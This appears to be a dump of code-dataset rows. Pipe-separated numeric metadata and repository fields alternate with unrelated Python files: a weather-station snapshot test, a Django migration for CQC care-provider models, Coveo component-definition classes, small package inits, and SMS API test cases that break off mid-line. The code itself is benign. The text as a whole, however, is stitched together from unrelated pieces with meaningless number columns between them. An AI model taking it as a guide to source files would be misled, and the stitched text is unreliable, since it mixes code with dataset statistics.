| 19.782609 | 74 | 0.660806 | 179 | 1,365 | 4.927374 | 0.139665 | 0.249433 | 0.192744 | 0.283447 | 0.946712 | 0.946712 | 0.909297 | 0.869615 | 0.869615 | 0.821995 | 0 | 0 | 0.272527 | 1,365 | 68 | 75 | 20.073529 | 0.888218 | 0.493773 | 0 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0 | 0 | 0.25 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 12 |
b7d541eb63fcec7c4978ad3576557046d22ba087 | 3,677 | py | Python | tests/snapshots/snap_test_stations.py | ssuffian/eeweather | 4581714e69839b64a22a5aa9ab682b26631cbb99 | [
"Apache-2.0"
] | 41 | 2018-02-01T22:10:49.000Z | 2022-03-22T17:47:21.000Z | tests/snapshots/snap_test_stations.py | ssuffian/eeweather | 4581714e69839b64a22a5aa9ab682b26631cbb99 | [
"Apache-2.0"
] | 61 | 2018-02-02T14:55:04.000Z | 2022-02-10T19:25:53.000Z | tests/snapshots/snap_test_stations.py | ssuffian/eeweather | 4581714e69839b64a22a5aa9ab682b26631cbb99 | [
"Apache-2.0"
] | 14 | 2018-09-08T05:48:59.000Z | 2022-01-26T20:23:43.000Z | # -*- coding: utf-8 -*-
# snapshottest: v1 - https://goo.gl/zC4yUc
from __future__ import unicode_literals
from snapshottest import Snapshot
snapshots = Snapshot()
snapshots['test_get_isd_filenames_single_year filenames'] = [
'/pub/data/noaa/2007/722860-23119-2007.gz'
]
snapshots['test_get_isd_filenames_multiple_year filenames'] = [
'/pub/data/noaa/2006/722860-23119-2006.gz',
'/pub/data/noaa/2007/722860-23119-2007.gz',
'/pub/data/noaa/2008/722860-23119-2008.gz',
'/pub/data/noaa/2009/722860-23119-2009.gz',
'/pub/data/noaa/2010/722860-23119-2010.gz',
'/pub/data/noaa/2011/722860-23119-2011.gz',
'/pub/data/noaa/2012/722860-23119-2012.gz',
'/pub/data/noaa/2013/722860-23119-2013.gz',
'/pub/data/noaa/2014/722860-23119-2014.gz',
'/pub/data/noaa/2015/722860-23119-2015.gz',
'/pub/data/noaa/2016/722860-23119-2016.gz',
'/pub/data/noaa/2017/722860-23119-2017.gz',
'/pub/data/noaa/2018/722860-23119-2018.gz',
'/pub/data/noaa/2019/722860-23119-2019.gz'
]
snapshots['test_isd_station_get_isd_filenames filenames'] = [
'/pub/data/noaa/2006/722860-23119-2006.gz',
'/pub/data/noaa/2007/722860-23119-2007.gz',
'/pub/data/noaa/2008/722860-23119-2008.gz',
'/pub/data/noaa/2009/722860-23119-2009.gz',
'/pub/data/noaa/2010/722860-23119-2010.gz',
'/pub/data/noaa/2011/722860-23119-2011.gz',
'/pub/data/noaa/2012/722860-23119-2012.gz',
'/pub/data/noaa/2013/722860-23119-2013.gz',
'/pub/data/noaa/2014/722860-23119-2014.gz',
'/pub/data/noaa/2015/722860-23119-2015.gz',
'/pub/data/noaa/2016/722860-23119-2016.gz',
'/pub/data/noaa/2017/722860-23119-2017.gz',
'/pub/data/noaa/2018/722860-23119-2018.gz',
'/pub/data/noaa/2019/722860-23119-2019.gz'
]
snapshots['test_isd_station_get_isd_filenames_with_year filenames'] = [
'/pub/data/noaa/2007/722860-23119-2007.gz'
]
snapshots['test_get_gsod_filenames_single_year filenames'] = [
'/pub/data/gsod/2007/722860-23119-2007.op.gz'
]
snapshots['test_get_gsod_filenames_multiple_year filenames'] = [
'/pub/data/gsod/2006/722860-23119-2006.op.gz',
'/pub/data/gsod/2007/722860-23119-2007.op.gz',
'/pub/data/gsod/2008/722860-23119-2008.op.gz',
'/pub/data/gsod/2009/722860-23119-2009.op.gz',
'/pub/data/gsod/2010/722860-23119-2010.op.gz',
'/pub/data/gsod/2011/722860-23119-2011.op.gz',
'/pub/data/gsod/2012/722860-23119-2012.op.gz',
'/pub/data/gsod/2013/722860-23119-2013.op.gz',
'/pub/data/gsod/2014/722860-23119-2014.op.gz',
'/pub/data/gsod/2015/722860-23119-2015.op.gz',
'/pub/data/gsod/2016/722860-23119-2016.op.gz',
'/pub/data/gsod/2017/722860-23119-2017.op.gz',
'/pub/data/gsod/2018/722860-23119-2018.op.gz',
'/pub/data/gsod/2019/722860-23119-2019.op.gz'
]
snapshots['test_isd_station_get_gsod_filenames_with_year filenames'] = [
'/pub/data/gsod/2007/722860-23119-2007.op.gz'
]
snapshots['test_isd_station_get_gsod_filenames filenames'] = [
'/pub/data/gsod/2006/722860-23119-2006.op.gz',
'/pub/data/gsod/2007/722860-23119-2007.op.gz',
'/pub/data/gsod/2008/722860-23119-2008.op.gz',
'/pub/data/gsod/2009/722860-23119-2009.op.gz',
'/pub/data/gsod/2010/722860-23119-2010.op.gz',
'/pub/data/gsod/2011/722860-23119-2011.op.gz',
'/pub/data/gsod/2012/722860-23119-2012.op.gz',
'/pub/data/gsod/2013/722860-23119-2013.op.gz',
'/pub/data/gsod/2014/722860-23119-2014.op.gz',
'/pub/data/gsod/2015/722860-23119-2015.op.gz',
'/pub/data/gsod/2016/722860-23119-2016.op.gz',
'/pub/data/gsod/2017/722860-23119-2017.op.gz',
'/pub/data/gsod/2018/722860-23119-2018.op.gz',
'/pub/data/gsod/2019/722860-23119-2019.op.gz'
]
| 39.537634 | 72 | 0.692684 | 598 | 3,677 | 4.177258 | 0.078595 | 0.168135 | 0.18735 | 0.135308 | 0.952762 | 0.943955 | 0.907526 | 0.907526 | 0.907526 | 0.881505 | 0 | 0.34584 | 0.101169 | 3,677 | 92 | 73 | 39.967391 | 0.409985 | 0.016862 | 0 | 0.759494 | 0 | 0 | 0.794574 | 0.772425 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.025316 | 0 | 0.025316 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 12 |
b7dfff035451e0cd9d045d4a86d867cd7bbd7d87 | 141 | py | Python | Titanic/utils/__init__.py | CoupleWinter/Kaggle | cb55a553f68364a9aff693986151f80a49967ec9 | [
"MIT"
] | null | null | null | Titanic/utils/__init__.py | CoupleWinter/Kaggle | cb55a553f68364a9aff693986151f80a49967ec9 | [
"MIT"
] | null | null | null | Titanic/utils/__init__.py | CoupleWinter/Kaggle | cb55a553f68364a9aff693986151f80a49967ec9 | [
"MIT"
] | null | null | null | # coding : utf-8
# Author : Noctis
# Date : 2018-3-18
from Titanic.utils.get_data import GetData
from Titanic.utils.get_data import get_data
| 23.5 | 43 | 0.765957 | 24 | 141 | 4.375 | 0.666667 | 0.2 | 0.304762 | 0.361905 | 0.552381 | 0.552381 | 0 | 0 | 0 | 0 | 0 | 0.066116 | 0.141844 | 141 | 5 | 44 | 28.2 | 0.801653 | 0.333333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
4d079a660cd90cb57767bf02516def43a9f84a01 | 23,855 | py | Python | other_data/migrations/0007_cqcbrand_cqclocation_cqcprovider.py | A-jha383/Charity_backend | 2f985dac9de41af80b593210e74bd1890022a435 | [
"MIT"
] | 1 | 2021-06-10T03:36:22.000Z | 2021-06-10T03:36:22.000Z | other_data/migrations/0007_cqcbrand_cqclocation_cqcprovider.py | A-jha383/Charity_backend | 2f985dac9de41af80b593210e74bd1890022a435 | [
"MIT"
] | null | null | null | other_data/migrations/0007_cqcbrand_cqclocation_cqcprovider.py | A-jha383/Charity_backend | 2f985dac9de41af80b593210e74bd1890022a435 | [
"MIT"
] | null | null | null | # Generated by Django 3.2 on 2021-04-19 11:28
import compositefk.fields
import django.db.models.deletion
from django.db import migrations, models
import ftc.models.orgid
class Migration(migrations.Migration):
dependencies = [
("ftc", "0015_organisationlocation_spider"),
(
"charity",
"0012_alter_ccewcharityareaofoperation_geographic_area_description",
),
("other_data", "0006_auto_20210419_1054"),
]
operations = [
migrations.CreateModel(
name="CQCBrand",
fields=[
("record_id", models.BigAutoField(primary_key=True, serialize=False)),
("id", models.CharField(max_length=255, verbose_name="Brand ID")),
("name", models.CharField(max_length=255, verbose_name="Brand Name")),
(
"spider",
models.CharField(db_index=True, default="cqc", max_length=200),
),
(
"scrape",
models.ForeignKey(
on_delete=django.db.models.deletion.DO_NOTHING, to="ftc.scrape"
),
),
],
),
migrations.CreateModel(
name="CQCProvider",
fields=[
(
"company_number",
models.CharField(
blank=True,
max_length=255,
null=True,
verbose_name="Provider Companies House Number",
),
),
(
"charity_number",
models.CharField(
blank=True,
max_length=255,
null=True,
verbose_name="Provider Charity Number",
),
),
(
"org_id",
ftc.models.orgid.OrgidField(
blank=True,
db_index=True,
max_length=200,
null=True,
verbose_name="Organisation Identifier",
),
),
("record_id", models.BigAutoField(primary_key=True, serialize=False)),
("id", models.CharField(max_length=255, verbose_name="Provider ID")),
(
"name",
models.CharField(max_length=255, verbose_name="Provider Name"),
),
(
"start_date",
models.DateField(
blank=True, null=True, verbose_name="Provider HSCA start date"
),
),
(
"end_date",
models.DateField(
blank=True,
default=None,
null=True,
verbose_name="Provider HSCA End Date",
),
),
(
"status",
models.CharField(
blank=True,
choices=[
("Registered", "Registered"),
("Deregistered (E)", "Deregistered E"),
("Deregistered (V)", "Deregistered V"),
("Dissolved", "Dissolved"),
("Removed", "Removed"),
],
default="Registered",
max_length=255,
null=True,
verbose_name="Provider Status",
),
),
(
"sector",
models.CharField(
blank=True,
choices=[
("Social Care Org", "Social Care"),
("Independent Healthcare Org", "Independent Healthcare"),
("Primary Dental Care", "Primary Dental Care"),
("Primary Medical Services", "Primary Medical Services"),
("Independent Ambulance", "Independent Ambulance"),
(
"NHS Healthcare Organisation",
"Nhs Healthcase Organisation",
),
],
max_length=255,
null=True,
verbose_name="Provider Type/Sector",
),
),
(
"directorate",
models.CharField(
blank=True,
choices=[
("Adult social care", "Adult Social Care"),
("Hospitals", "Hospitals"),
("Primary medical services", "Primary Medical Services"),
("Unspecified", "Unspecified"),
],
max_length=255,
null=True,
verbose_name="Provider Inspection Directorate",
),
),
(
"inspection_category",
models.CharField(
blank=True,
max_length=255,
null=True,
verbose_name="Provider Primary Inspection Category",
),
),
(
"ownership_type",
models.CharField(
blank=True,
choices=[
("Organisation", "Organisation"),
("Individual", "Individual"),
("Partnership", "Partnership"),
("NHS Body", "Nhs Body"),
],
max_length=255,
null=True,
verbose_name="Provider Ownership Type",
),
),
(
"telephone",
models.CharField(
blank=True,
max_length=255,
null=True,
verbose_name="Provider Telephone Number",
),
),
(
"web",
models.URLField(
blank=True,
max_length=255,
null=True,
verbose_name="Provider Web Address",
),
),
(
"address_street",
models.CharField(
blank=True,
max_length=255,
null=True,
verbose_name="Provider Street Address",
),
),
(
"address_2",
models.CharField(
blank=True,
max_length=255,
null=True,
verbose_name="Provider Address Line 2",
),
),
(
"address_city",
models.CharField(
blank=True,
max_length=255,
null=True,
verbose_name="Provider City",
),
),
(
"address_county",
models.CharField(
blank=True,
max_length=255,
null=True,
verbose_name="Provider County",
),
),
(
"address_postcode",
models.CharField(
blank=True,
max_length=255,
null=True,
verbose_name="Provider Postal Code",
),
),
(
"geo_uprn",
models.CharField(
blank=True,
max_length=255,
null=True,
verbose_name="Provider PAF / UPRN ID",
),
),
(
"geo_local_authority",
models.CharField(
blank=True,
max_length=255,
null=True,
verbose_name="Provider Local Authority",
),
),
(
"geo_region",
models.CharField(
blank=True,
max_length=255,
null=True,
verbose_name="Provider Region",
),
),
(
"geo_latitude",
models.FloatField(
blank=True, null=True, verbose_name="Provider Latitude"
),
),
(
"geo_longitude",
models.FloatField(
blank=True, null=True, verbose_name="Provider Longitude"
),
),
(
"geo_pcon",
models.CharField(
blank=True,
max_length=255,
null=True,
verbose_name="Provider Parliamentary Constituency",
),
),
(
"spider",
models.CharField(db_index=True, default="cqc", max_length=200),
),
(
"brand_id",
models.CharField(
blank=True, db_index=True, max_length=255, null=True
),
),
(
"brand",
compositefk.fields.CompositeForeignKey(
blank=True,
null=True,
null_if_equal=[],
on_delete=django.db.models.deletion.DO_NOTHING,
to="other_data.cqcbrand",
to_fields={
"id": compositefk.fields.LocalFieldValue("brand_id"),
"scrape_id": compositefk.fields.LocalFieldValue(
"scrape_id"
),
},
),
),
(
"scrape",
models.ForeignKey(
on_delete=django.db.models.deletion.DO_NOTHING, to="ftc.scrape"
),
),
],
),
migrations.CreateModel(
name="CQCLocation",
fields=[
("record_id", models.BigAutoField(primary_key=True, serialize=False)),
("id", models.CharField(max_length=255, verbose_name="Location ID")),
(
"start_date",
models.DateField(
blank=True, null=True, verbose_name="Location HSCA start date"
),
),
(
"end_date",
models.DateField(
blank=True,
default=None,
null=True,
verbose_name="Location HSCA End Date",
),
),
(
"status",
models.CharField(
blank=True,
choices=[
("Active", "Active"),
("Inactive-Dereg", "Inactive"),
("Removed", "Removed"),
],
default="Active",
max_length=255,
null=True,
verbose_name="Location Status",
),
),
(
"care_home",
models.BooleanField(
blank=True, null=True, verbose_name="Care home?"
),
),
(
"name",
models.CharField(max_length=255, verbose_name="Location Name"),
),
(
"ods_code",
models.CharField(
blank=True,
max_length=255,
null=True,
verbose_name="Location ODS Code",
),
),
(
"telephone",
models.CharField(
blank=True,
max_length=255,
null=True,
verbose_name="Location Telephone Number",
),
),
(
"web",
models.URLField(
blank=True,
max_length=255,
null=True,
verbose_name="Location Web Address",
),
),
(
"care_home_beds",
models.IntegerField(
blank=True, null=True, verbose_name="Care homes beds"
),
),
(
"sector",
models.CharField(
blank=True,
choices=[
("Social Care Org", "Social Care"),
("Independent Healthcare Org", "Independent Healthcare"),
("Primary Dental Care", "Primary Dental Care"),
("Primary Medical Services", "Primary Medical Services"),
("Independent Ambulance", "Independent Ambulance"),
(
"NHS Healthcare Organisation",
"Nhs Healthcase Organisation",
),
],
max_length=255,
null=True,
verbose_name="Location Type/Sector",
),
),
(
"directorate",
models.CharField(
blank=True,
choices=[
("Adult social care", "Adult Social Care"),
("Hospitals", "Hospitals"),
("Primary medical services", "Primary Medical Services"),
("Unspecified", "Unspecified"),
],
max_length=255,
null=True,
verbose_name="Location Inspection Directorate",
),
),
(
"inspection_category",
models.CharField(
blank=True,
max_length=255,
null=True,
verbose_name="Location Primary Inspection Category",
),
),
(
"latest_overall_rating",
models.CharField(
blank=True,
choices=[
("Inadequate", "Inadequate"),
("Requires improvement", "Requires Improvement"),
("Good", "Good"),
("Outstanding", "Outstanding"),
],
max_length=255,
null=True,
verbose_name="Location Latest Overall Rating",
),
),
(
"publication_date",
models.DateField(
blank=True, null=True, verbose_name="Publication Date"
),
),
(
"inherited_rating",
models.BooleanField(
blank=True, null=True, verbose_name="Inherited Rating (Y/N)"
),
),
(
"geo_region",
models.CharField(
blank=True,
max_length=255,
null=True,
verbose_name="Location Region",
),
),
(
"geo_local_authority",
models.CharField(
blank=True,
max_length=255,
null=True,
verbose_name="Location Local Authority",
),
),
(
"geo_onspd_ccg_code",
models.CharField(
blank=True,
max_length=255,
null=True,
verbose_name="Location ONSPD CCG Code",
),
),
(
"geo_onspd_ccg",
models.CharField(
blank=True,
max_length=255,
null=True,
verbose_name="Location ONSPD CCG",
),
),
(
"geo_commissioning_ccg_code",
models.CharField(
blank=True,
max_length=255,
null=True,
verbose_name="Location Commissioning CCG Code",
),
),
(
"geo_commissioning_ccg",
models.CharField(
blank=True,
max_length=255,
null=True,
verbose_name="Location Commissioning CCG",
),
),
(
"address_street",
models.CharField(
blank=True,
max_length=255,
null=True,
verbose_name="Location Street Address",
),
),
(
"address_2",
models.CharField(
blank=True,
max_length=255,
null=True,
verbose_name="Location Address Line 2",
),
),
(
"address_city",
models.CharField(
blank=True,
max_length=255,
null=True,
verbose_name="Location City",
),
),
(
"address_county",
models.CharField(
blank=True,
max_length=255,
null=True,
verbose_name="Location County",
),
),
(
"address_postcode",
models.CharField(
blank=True,
max_length=255,
null=True,
verbose_name="Location Postal Code",
),
),
(
"geo_uprn",
models.CharField(
blank=True,
max_length=255,
null=True,
verbose_name="Location PAF / UPRN ID",
),
),
(
"geo_latitude",
models.FloatField(
blank=True, null=True, verbose_name="Location Latitude"
),
),
(
"geo_longitude",
models.FloatField(
blank=True, null=True, verbose_name="Location Longitude"
),
),
(
"geo_pcon",
models.CharField(
blank=True,
max_length=255,
null=True,
verbose_name="Location Parliamentary Constituency",
),
),
(
"spider",
models.CharField(db_index=True, default="cqc", max_length=200),
),
(
"provider_id",
models.CharField(
blank=True, db_index=True, max_length=255, null=True
),
),
(
"classification",
models.ManyToManyField(to="charity.VocabularyEntries"),
),
(
"provider",
compositefk.fields.CompositeForeignKey(
blank=True,
null=True,
null_if_equal=[],
on_delete=django.db.models.deletion.DO_NOTHING,
related_name="locations",
to="other_data.cqcprovider",
to_fields={
"id": compositefk.fields.LocalFieldValue("provider_id"),
"scrape_id": compositefk.fields.LocalFieldValue(
"scrape_id"
),
},
),
),
(
"scrape",
models.ForeignKey(
on_delete=django.db.models.deletion.DO_NOTHING, to="ftc.scrape"
),
),
],
),
]
| 37.805071 | 88 | 0.32052 | 1,296 | 23,855 | 5.736883 | 0.134259 | 0.08581 | 0.104909 | 0.132885 | 0.811163 | 0.802824 | 0.789375 | 0.77848 | 0.729523 | 0.69388 | 0 | 0.02057 | 0.602599 | 23,855 | 630 | 89 | 37.865079 | 0.763713 | 0.001803 | 0 | 0.696629 | 1 | 0 | 0.147023 | 0.010138 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.006421 | 0 | 0.011236 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
4d5cf0a3f0dbd18c37ed6753b5fd3d556a9a8290 | 7,795 | py | Python | generators/simple/templates/src/platform/extensionRunner/cdf/component_definition.py | jfallaire/generator-ps-boilerplate-project | 36f544a54442c191430451715425da98ea76a63e | [
"MIT"
] | 2 | 2019-07-24T16:00:51.000Z | 2019-10-03T18:36:20.000Z | generators/simple/templates/src/platform/extensionRunner/cdf/component_definition.py | jfallaire/generator-ps-boilerplate-project | 36f544a54442c191430451715425da98ea76a63e | [
"MIT"
] | 19 | 2019-06-20T21:58:44.000Z | 2020-11-05T13:48:42.000Z | generators/simple/templates/src/platform/extensionRunner/cdf/component_definition.py | jfallaire/generator-ps-boilerplate-project | 36f544a54442c191430451715425da98ea76a63e | [
"MIT"
] | 1 | 2019-06-22T17:30:42.000Z | 2019-06-22T17:30:42.000Z | """
- THIS FILE IS GENERATED -
dependencies/CDF/CDFComponentDefinition.jid
"""
from attr import attrs
from typing import Dict, List, Optional as Opt
from .root import JidType
@attrs(kw_only=True, auto_attribs=True)
class Parameter(JidType, hint="Coveo.Cdf.Component.Parameter"):
"""A structure that represents a configuration parameter.
Attributes:
name: The name of the parameter, for display.
default_value: The default value of the parameter.
tag: The tag used to identify the parameter within the files. In the files, each tag must be enclosed in double-percent signs (e.g.: %%myTag%%).
"""
name: Opt[str] = None
default_value: Opt[str] = None
tag: Opt[str] = None
def __init__(self, *, name: Opt[str] = None, default_value: Opt[str] = None, tag: Opt[str] = None) -> None:
"""
Parameters:
name: The name of the parameter, for display.
default_value: The default value of the parameter.
tag: The tag used to identify the parameter within the files. In the files, each tag must be enclosed in double-percent signs (e.g.: %%myTag%%).
"""
@attrs(kw_only=True, auto_attribs=True)
class ParametersDefinition(JidType, hint="Coveo.Cdf.Component.ParametersDefinition"):
"""A structure that represents configuration parameters and the text files in which they appear.
Attributes:
files: A list of text files to search for parameter tags.
parameters: The list of configuration parameters to apply.
"""
files: Opt[List[str]] = None
parameters: Opt[List[Parameter]] = None
def __init__(self, *, files: Opt[List[str]] = None, parameters: Opt[List[Parameter]] = None) -> None:
"""
Parameters:
files: A list of text files to search for parameter tags.
parameters: The list of configuration parameters to apply.
"""
@attrs(kw_only=True, auto_attribs=True)
class InstanceDefinition(JidType, hint="Coveo.Cdf.Component.InstanceDefinition"):
"""A structure that represents an instance template.
Attributes:
type_name: The name of the instance template. Used as Id, unique per component.
description: The description of the instance template.
package_file_name: The filename of the instance package to use within the component package.
install_command: A command to execute each time an instance of this type is created on an agent.
uninstall_command: A command to execute each time an instance of this type is removed from an agent.
parameters_definition: A list of configuration parameters.
executable_path: The command to execute. Path must be relative to the root of the archive.
command_parameters: The command line parameters to use when launching the executable.
is_node_process: Indicates if the instance is a 'Node Process'.
"""
type_name: Opt[str] = None
description: Opt[str] = None
package_file_name: Opt[str] = None
install_command: Opt[str] = None
uninstall_command: Opt[str] = None
parameters_definition: Opt[ParametersDefinition] = None
executable_path: Opt[str] = None
command_parameters: Opt[str] = None
is_node_process: Opt[bool] = None
def __init__(
self,
*,
type_name: Opt[str] = None,
description: Opt[str] = None,
package_file_name: Opt[str] = None,
install_command: Opt[str] = None,
uninstall_command: Opt[str] = None,
parameters_definition: Opt[ParametersDefinition] = None,
executable_path: Opt[str] = None,
command_parameters: Opt[str] = None,
is_node_process: Opt[bool] = None,
) -> None:
"""
Parameters:
type_name: The name of the instance template. Used as Id, unique per component.
description: The description of the instance template.
package_file_name: The filename of the instance package to use within the component package.
install_command: A command to execute each time an instance of this type is created on an agent.
uninstall_command: A command to execute each time an instance of this type is removed from an agent.
parameters_definition: A list of configuration parameters.
executable_path: The command to execute. Path must be relative to the root of the archive.
command_parameters: The command line parameters to use when launching the executable.
is_node_process: Indicates if the instance is a 'Node Process'.
"""
@attrs(kw_only=True, auto_attribs=True)
class ComponentDefinition(JidType, hint="Coveo.Cdf.Component.ComponentDefinition"):
"""A structure that represents a component package.
Attributes:
name: The name of the component. Components of the same name can coexist if their versions differ.
version: The version of the component. Used as Id, unique per component. Used in conjunction with the component name, the Id becomes unique per node manager and/or agent.
        platform: The platform on which the component can be deployed.
target: The target of the package's binaries.
description: The description of the component.
location: The path to locate the component package.
install_command: A command to execute each time the component package is deployed to an agent.
uninstall_command: A command to execute each time the component package is removed from an agent.
environment: A list of environment variables set specifically for the component.
parameters_definition: A list of configuration parameters.
instances: The list of instance templates defined by this component package.
"""
name: Opt[str] = None
version: Opt[str] = None
platform: Opt[str] = None
target: Opt[str] = None
description: Opt[str] = None
location: Opt[str] = None
install_command: Opt[str] = None
uninstall_command: Opt[str] = None
environment: Opt[Dict[str, str]] = None
parameters_definition: Opt[ParametersDefinition] = None
instances: Opt[List[InstanceDefinition]] = None
def __init__(
self,
*,
name: Opt[str] = None,
version: Opt[str] = None,
platform: Opt[str] = None,
target: Opt[str] = None,
description: Opt[str] = None,
location: Opt[str] = None,
install_command: Opt[str] = None,
uninstall_command: Opt[str] = None,
environment: Opt[Dict[str, str]] = None,
parameters_definition: Opt[ParametersDefinition] = None,
instances: Opt[List[InstanceDefinition]] = None,
) -> None:
"""
Parameters:
name: The name of the component. Components of the same name can coexist if their versions differ.
version: The version of the component. Used as Id, unique per component. Used in conjunction with the component name, the Id becomes unique per node manager and/or agent.
            platform: The platform on which the component can be deployed.
target: The target of the package's binaries.
description: The description of the component.
location: The path to locate the component package.
install_command: A command to execute each time the component package is deployed to an agent.
uninstall_command: A command to execute each time the component package is removed from an agent.
environment: A list of environment variables set specifically for the component.
parameters_definition: A list of configuration parameters.
instances: The list of instance templates defined by this component package.
"""
| 45.319767 | 182 | 0.682104 | 1,017 | 7,795 | 5.149459 | 0.136677 | 0.053466 | 0.068742 | 0.021386 | 0.905098 | 0.874165 | 0.870346 | 0.870346 | 0.834065 | 0.834065 | 0 | 0 | 0.245927 | 7,795 | 171 | 183 | 45.584795 | 0.890949 | 0.585888 | 0 | 0.454545 | 1 | 0 | 0.052765 | 0.052765 | 0 | 0 | 0 | 0 | 0 | 1 | 0.060606 | false | 0 | 0.045455 | 0 | 0.545455 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 8 |
4d7edab9b75fbe564bfe8fbfcd6439cb678b5331 | 117 | py | Python | apps/quality/serializes/__init__.py | kane-zh/MES_server | d8d28768a054eee6433e3900908afd331fd92281 | [
"Apache-2.0"
] | null | null | null | apps/quality/serializes/__init__.py | kane-zh/MES_server | d8d28768a054eee6433e3900908afd331fd92281 | [
"Apache-2.0"
] | null | null | null | apps/quality/serializes/__init__.py | kane-zh/MES_server | d8d28768a054eee6433e3900908afd331fd92281 | [
"Apache-2.0"
] | null | null | null | from apps.quality.serializes.basicinfor_serialize import *
from apps.quality.serializes.recording_serialize import * | 58.5 | 59 | 0.863248 | 14 | 117 | 7.071429 | 0.571429 | 0.161616 | 0.30303 | 0.505051 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.068376 | 117 | 2 | 60 | 58.5 | 0.908257 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
4d93682aee37e87eb8fcda3941187df3b3a3a4f9 | 4,473 | py | Python | server_app/test_cases.py | chaitphani/server_API-worker | 6da5d14696ff1c06f8d8aa322d98c46497a25f87 | [
"MIT"
] | null | null | null | server_app/test_cases.py | chaitphani/server_API-worker | 6da5d14696ff1c06f8d8aa322d98c46497a25f87 | [
"MIT"
] | null | null | null | server_app/test_cases.py | chaitphani/server_API-worker | 6da5d14696ff1c06f8d8aa322d98c46497a25f87 | [
"MIT"
] | null | null | null | from django.contrib.auth.models import User
from django.test import TestCase
from django.urls import reverse
from rest_framework.test import APITestCase
from server_app.models import phone_number, account
def login_user():
user = User.objects.create_user("test_user", email="test_user@mail.com", password="test123")
account_obj = account.objects.create(user=user, auth_id='tui7869', username=user.username)
phone_num = phone_number.objects.create(number=1234567890, account=account_obj)
return user, phone_num
class InboundSmsTestCase(APITestCase):
    # missing "to" parameter gives 403 error
def test_inbound_with_out_to(self):
url = reverse("api_inbound")
user, phone_num = login_user()
self.client.force_authenticate(user)
response = self.client.post(url, {
"_from": 'this is testing from',
"_text":'Hi this is testing text'
}, format='multipart')
self.assertEqual(403, response.status_code)
    # missing "from" parameter gives 403 error
def test_inbound_with_out_from(self):
url = reverse("api_inbound")
user, phone_num = login_user()
self.client.force_authenticate(user)
response = self.client.post(url, {
"_to": 'this is testing to',
"_text":'Hi this is testing text'
}, format='multipart')
self.assertEqual(403, response.status_code)
    # missing "text" parameter gives 403 error
def test_inbound_with_out_text(self):
url = reverse("api_inbound")
user, phone_num = login_user()
self.client.force_authenticate(user)
response = self.client.post(url, {
"_from": 'this is testing from',
"_to":'Hi this is testing to'
}, format='multipart')
self.assertEqual(403, response.status_code)
def test_inbound_sms_not_match_to_with_user_num(self):
url = reverse("api_inbound")
user, phone_num = login_user()
self.client.force_authenticate(user)
response = self.client.post(url, {
"_to": 864769,
"_text": "hi this is also testing text",
"_from": "this is testing from",
}, format='json')
self.assertEqual(403, response.status_code)
def test_inbound_sms_stop_in_text(self):
url = reverse("api_inbound")
user, phone_num = login_user()
self.client.force_authenticate(user)
response = self.client.post(url, {
"_to": 864769,
"_text": "hi STOP is also testing text",
"_from": "this is testing from",
}, format='json')
self.assertEqual(403, response.status_code)
class OutboundSmsTestCase(APITestCase):
    # missing "to" parameter gives 403 error
def test_outbound_with_out_to(self):
url = reverse("api_outbound")
user, phone_num = login_user()
self.client.force_authenticate(user)
response = self.client.post(url, {
"from": 'this is testing from',
"text":'Hi this is testing text'
}, format='multipart')
self.assertEqual(403, response.status_code)
    # missing "from" parameter gives 403 error
def test_outbound_with_out_from(self):
url = reverse("api_outbound")
user, phone_num = login_user()
self.client.force_authenticate(user)
response = self.client.post(url, {
"to": 'this is testing to',
"text":'Hi this is testing text'
}, format='multipart')
self.assertEqual(403, response.status_code)
    # missing "text" parameter gives 403 error
def test_outbound_with_out_text(self):
url = reverse("api_outbound")
user, phone_num = login_user()
self.client.force_authenticate(user)
response = self.client.post(url, {
"from": 'this is testing from',
"to":'Hi this is testing to'
}, format='multipart')
self.assertEqual(403, response.status_code)
def test_outbound_sms_not_match_from_with_user_num(self):
        # outbound endpoint and outbound-style keys (the original pointed at
        # api_inbound with _-prefixed keys, a copy-paste slip)
        url = reverse("api_outbound")
        user, phone_num = login_user()
        self.client.force_authenticate(user)
        response = self.client.post(url, {
            "to": 864769,
